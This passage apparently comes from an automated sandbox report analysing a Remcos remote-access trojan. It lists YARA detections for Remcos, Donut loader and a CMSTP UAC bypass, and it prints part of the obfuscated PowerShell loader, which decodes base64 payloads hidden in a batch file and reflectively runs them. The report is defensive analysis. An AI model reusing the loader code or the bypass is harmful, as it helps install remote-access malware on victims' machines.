16_2_0040CA46 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00405235 |
16_2_00405235 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_004032C8 |
16_2_004032C8 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00401689 |
16_2_00401689 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 16_2_00402F60 |
16_2_00402F60 |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 0044DDB0 appears 33 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 00418555 appears 34 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 004186B6 appears 58 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 004188FE appears 88 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 00422297 appears 42 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 00444B5A appears 37 times |
|
Source: C:\Windows\SysWOW64\recover.exe |
Code function: String function: 00413025 appears 79 times |
|
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda |
Source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) |
Source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: 00000005.00000002.3689629684.000000000AA0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000005.00000002.3674098163.0000000006A82000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: 00000005.00000002.3668466296.00000000066EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13 |
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23 |
Source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs |
Cryptographic APIs: 'TransformFinalBlock' |
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 5.2.powershell.exe.89d0000.4.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 5.2.powershell.exe.6610aa0.1.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 5.2.powershell.exe.99013e8.8.raw.unpack, chnomklatz.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: C:\Windows\SysWOW64\recover.exe |
Code function: 12_2_00415799 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, |
12_2_00415799 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$evuto.CopyTo($avier);$evuto.Dispose();$pysls.Dispose();$avier.Dispose();$avier.ToArray();}function kjgun($param_var,$param2_var){$qhonl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$wstpn=$qhonl.EntryPoint;$wstpn.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $jmdom;$uxzeu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jmdom).Split([Environment]::NewLine);foreach ($kbqsw in $uxzeu) {if ($kbqsw.StartsWith(':: ')){$hzwcr=$kbqsw.Substring(3);break;}}$gezfo=[string[]]$hzwcr.Split('\');$kcecj=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[0])));$cutbf=ebqqx (zihtg ([Convert]::FromBase64String($gezfo[1])));kjgun $kcecj $null;kjgun $cutbf (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Tran |